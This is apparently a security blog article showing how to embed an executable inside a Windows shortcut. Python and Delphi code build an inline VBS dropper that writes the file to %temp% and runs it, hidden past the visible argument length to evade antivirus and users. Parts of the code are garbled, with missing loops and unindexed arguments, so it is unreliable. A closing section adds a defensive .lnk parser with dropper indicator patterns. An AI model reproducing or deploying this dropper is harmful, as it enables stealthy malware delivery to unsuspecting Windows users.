It was only yesterday that we reported about a way of infecting Microsoft Windows users by using a simple shortcut trick with the BITSAdmin Tool to download and execute a remote application.
If you haven’t already read the article, please click here.
The main issue with the first example is that your firewall could potentially block the download attempt since it requires a remote http/https connection to download the file before its execution.
Our security researcher has found another sneaky way of exploiting the Windows shortcut with a new 0day by embedding any files (such as application files) directly inside the shortcut itself.
Yes! The application is inside the Windows shortcut.
This makes the malicious application fully undetectable by any antivirus software until it is dropped and executed.
Note: As an example, in the PoC below we decided to use this vulnerability as a file dropper, but we could also create a version that injects the binary directly into memory without ever writing it to disk, which would make it even harder for antivirus software to detect on execution. We will probably write another article about this method later.
How does it work?
The first thing to do is to create a malicious VBS (Visual Basic Script) which will:
- Hold the application file as an array of bytes (generated by a Python script)
- Create a temporary .exe file
- Write the byte array to this temporary file
- Execute the temporary .exe file.
When the VBS script is ready, still using our Python script example, we translate the VBS code into a single equivalent command line to be inserted into the new shortcut.
Windows normally allows a maximum shortcut command line of around 260 characters, but with our previous Delphi trick for creating a new shortcut you can insert any number of characters without breaking the shortcut.
Create inline malicious VBS app extractor (Python 3.5)
```python
# SHORTCUT EXPLOIT : FILE BINDER (WRAPPER)
# DISCOVERED AND CODED BY : @DarkCoderSc
# Lead Developer / Security Researcher at Phrozen SAS (https://phrozensoft.com)
# This little script will generate a malicious shortcut. A file will be embedded
# inside; when executed it will be extracted and executed.
if len(sys.argv) != 3:
    print(r"1) The executable file to be dropped (Needs to Exists)")
    print(r"2) The destination malicious shell payload file")
FEXEFile = str(sys.argv)
FFileDest = str(sys.argv)
if not os.path.exists(FEXEFile):
    print("The input executable file must exists!")
# TRANSFORM INPUT FILE IN BINARY ARRAY
payload = "payload=array(";
with open(FEXEFile, 'rb') as FFile:
    s = FFile.read(1)
    if len(s) == 0: break
    b = ord(s)
    payload += str(b) + ","
payload = payload[:-1]
payload += ")"
# WRITE VBS EXTRACTION AND EXECUTION CODE TO BE PLACED IN A SHELL
tempFile = " >> %temp%\\tmp.vbs"
maliciousVBS = "del %temp%\\tmp.vbs & "
maliciousVBS += "echo " + payload + tempFile + " & "
maliciousVBS += "echo " + "Set FSO = Wscript.CreateObject(\"Scripting.FileSystemObject\")" + tempFile + " & "
maliciousVBS += "echo " + "Set CTF = FSO.CreateTextFile(\"%temp%\\tmp.exe\")" + tempFile + " & "
maliciousVBS += "echo " + "for i = 0 to UBound(payload)" + tempFile + " & "
maliciousVBS += "echo " + "buff = buff^&chr(payload(i))" + tempFile + " & "
maliciousVBS += "echo " + "next" + tempFile + " & "
maliciousVBS += "echo " + "CTF.Write buff" + tempFile + " & "
maliciousVBS += "echo " + "Dim objShell" + tempFile + " & "
maliciousVBS += "echo " + "Set objShell = WScript.CreateObject(\"WScript.Shell\")" + tempFile + " & "
maliciousVBS += "echo " + "CTF.Close" + tempFile + " & "
maliciousVBS += "echo " + "objShell.Run(\"%temp%\\tmp.exe\")" + tempFile + " & "
maliciousVBS += "%temp%\\tmp.vbs"
with open(FFileDest, 'w') as FDest:
```
Inject VBS to Shortcut (Delphi)
```delphi
// SHORTCUT EXPLOIT : FILE BINDER (WRAPPER)
// DISCOVERED AND CODED BY : @DarkCoderSc
// Lead Developer / Security Researcher at Phrozen SAS (https://phrozensoft.com)
System.SysUtils, ActiveX, ShlObj, ComObj, Windows, Classes;
function MaliciousLnk(cmd, destPath : String) : Boolean;
var cObject : IUnknown;
shellLink : IShellLink;
PFile : IPersistFile;
result := false;
cObject := CreateComObject(CLSID_ShellLink);
shellLink := cObject as IShellLink;
PFile := cObject as IPersistFile;
cmd := '/C "' + cmd + '"';
result := PFile.Save(PWideChar(destPath), false) = S_OK;
var Arg1, Arg2 : String;
strList : TStringList;
if ParamCount <> 2 then begin
writeln('- Arg1 : Payload file, generated with the "gen_shortcut_code.py"');
writeln('- Arg2 : Full path of destination shortcut');
Arg1 := ParamStr(1);
Arg2 := ParamStr(2);
if NOT FileExists(Arg1) then exit;
// THIS IS JUST A LAZY WORKING EXAMPLE OF OPENING TEXT FILES
strList := TStringList.Create;
writeln(#13#10 + 'Press enter to leave...');
```
Example of payload (Simple Hello World in Assembly x86)
The maximum size of a shortcut is around 64 KiB, which makes this exploit compatible with many known and unknown viruses.
• Generate inline malicious VBS application extractor
py gen_inlinecode.py @APPLICATION_LOCATION @PAYLOAD_DESTINATION
• Then generate the shortcut
shortcut_gen.exe @PAYLOAD_LOCATION @SHORTCUT_DESTINATION
You should now see a new shortcut containing the whole application. When executed, it will extract the embedded application and then run it from the temporary folder.
Note that if you open the shortcut's properties, the whole code is not visible, since Microsoft normally only allows 260 bytes in the argument field. This makes the shortcut even more difficult to spot. We could also modify our script to generate regular junk "code" before the exploit code, so that a regular user would think it is a normal, safe shortcut.
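The two properties this article relies on, an argument string longer than the roughly 260 characters the Properties dialog shows and a `cmd /C` argument that echoes VBS lines into `%temp%`, are exactly what a defender can check for. The following is an added example, not code from the article or from Phrozen SAS: a small parser for the ShellLink (.lnk) header and StringData section that pulls out the COMMAND_LINE_ARGUMENTS string, measures it against the visible limit and matches it against indicator tokens taken from the dropper command line above. The indicator list, the `VISIBLE_ARG_LIMIT` constant and the `build_sample_lnk` fixture builder are assumptions made for this example; the fixture writes only the header and two StringData fields so the detector can be exercised offline.

```python
import re
import struct

# Constants from the ShellLink (.lnk) binary format (MS-SHLLINK).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
FLAG_HAS_IDLIST = 0x01
FLAG_HAS_LINKINFO = 0x02
FLAG_HAS_NAME = 0x04
FLAG_HAS_RELPATH = 0x08
FLAG_HAS_WORKDIR = 0x10
FLAG_HAS_ARGS = 0x20
FLAG_HAS_ICON = 0x40
FLAG_IS_UNICODE = 0x80

# Assumed threshold: roughly what the shortcut Properties dialog displays.
VISIBLE_ARG_LIMIT = 260

# Indicator tokens drawn from the inline-VBS dropper command line (constructed list).
INDICATORS = [
    r"payload=array\(",
    r">>\s*%temp%\\[^\s&]+\.vbs",
    r"Scripting\.FileSystemObject",
    r"WScript\.Shell",
    r"objShell\.Run",
]


def parse_lnk(data: bytes) -> dict:
    """Parse the ShellLinkHeader, skip IDList/LinkInfo, and decode the StringData fields."""
    if len(data) < LNK_HEADER_SIZE or data[:4] != struct.pack("<I", LNK_HEADER_SIZE):
        raise ValueError("not a ShellLink header")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad ShellLink CLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & FLAG_HAS_IDLIST:          # LinkTargetIDList: uint16 size + IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG_HAS_LINKINFO:        # LinkInfo: first uint32 is the total size
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & FLAG_IS_UNICODE)
    strings = {}
    # StringData fields appear in this fixed order, each only if its flag is set.
    for flag, name in ((FLAG_HAS_NAME, "name"), (FLAG_HAS_RELPATH, "relative_path"),
                       (FLAG_HAS_WORKDIR, "working_dir"), (FLAG_HAS_ARGS, "arguments"),
                       (FLAG_HAS_ICON, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, not bytes
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        strings[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return {"flags": flags, "strings": strings}


def assess_lnk(data: bytes) -> dict:
    """Flag a shortcut whose arguments are hidden by length or match dropper indicators."""
    args = parse_lnk(data)["strings"].get("arguments", "")
    hits = [p for p in INDICATORS if re.search(p, args, re.IGNORECASE)]
    return {
        "argument_length": len(args),
        "exceeds_visible_limit": len(args) > VISIBLE_ARG_LIMIT,
        "indicators": hits,
        "suspicious": len(args) > VISIBLE_ARG_LIMIT or bool(hits),
    }


def build_sample_lnk(arguments: str, relative_path: str = "cmd.exe") -> bytes:
    """Constructed test fixture: header plus RELATIVE_PATH and COMMAND_LINE_ARGUMENTS only."""
    flags = FLAG_HAS_RELPATH | FLAG_HAS_ARGS | FLAG_IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))  # attributes/timestamps zeroed
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed sample mirroring the dropper's shape (a padded byte array, not a real binary).
SAMPLE_DROPPER_ARGS = (
    r'/C "del %temp%\tmp.vbs & echo payload=array(' + ",".join(["0"] * 120)
    + r') >> %temp%\tmp.vbs & '
    r'echo Set FSO = Wscript.CreateObject("Scripting.FileSystemObject") >> %temp%\tmp.vbs & '
    r'echo Set objShell = WScript.CreateObject("WScript.Shell") >> %temp%\tmp.vbs & '
    r'echo objShell.Run("%temp%\tmp.exe") >> %temp%\tmp.vbs & %temp%\tmp.vbs"'
)
SAMPLE_BENIGN_ARGS = '/C "dir"'

if __name__ == "__main__":
    for label, args in (("dropper-like", SAMPLE_DROPPER_ARGS), ("benign", SAMPLE_BENIGN_ARGS)):
        print(label, assess_lnk(build_sample_lnk(args)))
```

Run over real files with `assess_lnk(open(path, "rb").read())`; the length check alone catches the hiding trick the article describes regardless of the payload, and the indicator list is where you would add the tokens of whatever variant you are hunting.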